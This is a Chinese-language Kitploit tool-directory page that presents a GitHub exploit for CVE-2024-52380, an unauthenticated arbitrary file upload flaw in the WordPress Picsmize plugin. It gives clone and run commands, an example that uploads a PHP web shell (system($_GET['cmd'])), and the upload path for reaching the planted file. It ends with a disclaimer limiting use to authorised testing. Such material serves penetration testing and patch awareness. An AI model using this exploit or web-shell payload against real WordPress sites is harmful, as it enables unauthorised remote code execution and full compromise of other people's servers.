Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
工具/GitHubGitHub/nxploited/cve-2024-52380-exploit
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用Web安全渗透测试
GitHubnxploited/cve-2024-52380-exploit

CVE-2024-52380-Exploit

WordPress 的 Picsmize 插件存在任意文件上传漏洞。

查看仓库
311年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2024-52380-Exploit

WordPress 的 Picsmize 插件存在任意文件上传漏洞。

描述

此脚本利用 WordPress 的 Picsmize 插件 中的一个漏洞(CVE-2024-52380),允许未认证攻击者进行任意文件上传。该漏洞存在于 Picsmize 的 1.0.0 及之前所有版本中。利用此漏洞可能导致在目标服务器上远程执行代码。

🌟 功能特性

  • 检查插件版本:自动验证目标 WordPress 站点是否使用了易受攻击的 Picsmize 插件版本。
  • 文件上传利用:如果站点存在漏洞,则向目标服务器上传任意 PHP 载荷。
  • 命令行界面:易于使用的 CLI,用于指定目标 URL 和载荷。

📖 漏洞详情

  • 插件名称:Picsmize
  • 受影响版本:所有版本 ≤ 1.0.0
  • 漏洞类型:未认证的任意文件上传
  • CVE ID:CVE-2024-52380

🚀 使用说明

先决条件

  • Python 3.7 或更高版本
  • requests 库(pip install requests)

运行脚本

  1. 克隆仓库:
    root@kitploit:~
    git clone https://github.com/Nxploited/CVE-2024-52380-Exploit.git
    cd CVE-2024-52380-Exploit
    
    

用法 -help:

root@kitploit:~
usage: CVE-2024-52380.py [-h] -u URL [-c CONTENT]

Check plugin version and upload a PHP file to a WordPress site.

options:
  -h, --help            show this help message and exit
  -u URL, --url URL     Base URL of the WordPress site (e.g., http://192.168.100.74:888).
  -c CONTENT, --content CONTENT
                        Content of the PHP file to be uploaded.

示例

root@kitploit:~
python CVE-2024-52380.py -u http://192.168.1.100 -c "<?php system($_GET['cmd']); ?>"

命令行参数

该脚本提供两个命令行参数,以便使用:

  1. -u / --url(必填):

    • 用途:指定目标 WordPress 站点的基础 URL。
    • 示例:
      root@kitploit:~
      -u http://example.com
      
  2. -c / --content(可选):

    • 用途:设置要上传的 PHP 载荷内容。
    • 默认值:
      root@kitploit:~
      <?php phpinfo(); ?>
      
    • 示例:
      root@kitploit:~
      -c "<?php system($_GET['cmd']); ?>"
      

📂 文件上传路径

说明:

  • /wordpress:WordPress 站点的根目录。
  • wp-content/uploads:WordPress 中媒体上传的默认目录。
  • 2025/01:该目录结构对应于基于服务器日期配置的年份(2025)和月份(一月)。

如何访问上传的文件:

  1. 上传成功后,使用完整 URL 访问该文件。 示例:

http://target-site.com/wordpress/wp-content/uploads/2025/01/t-678b2ef61b3f41737174774.php

⚠️ 免责声明

此工具仅用于教育目的和授权安全测试。在未经授权的情况下,对您不拥有或未经明确许可进行测试的系统使用此工具,是非法且不道德的。

下载工具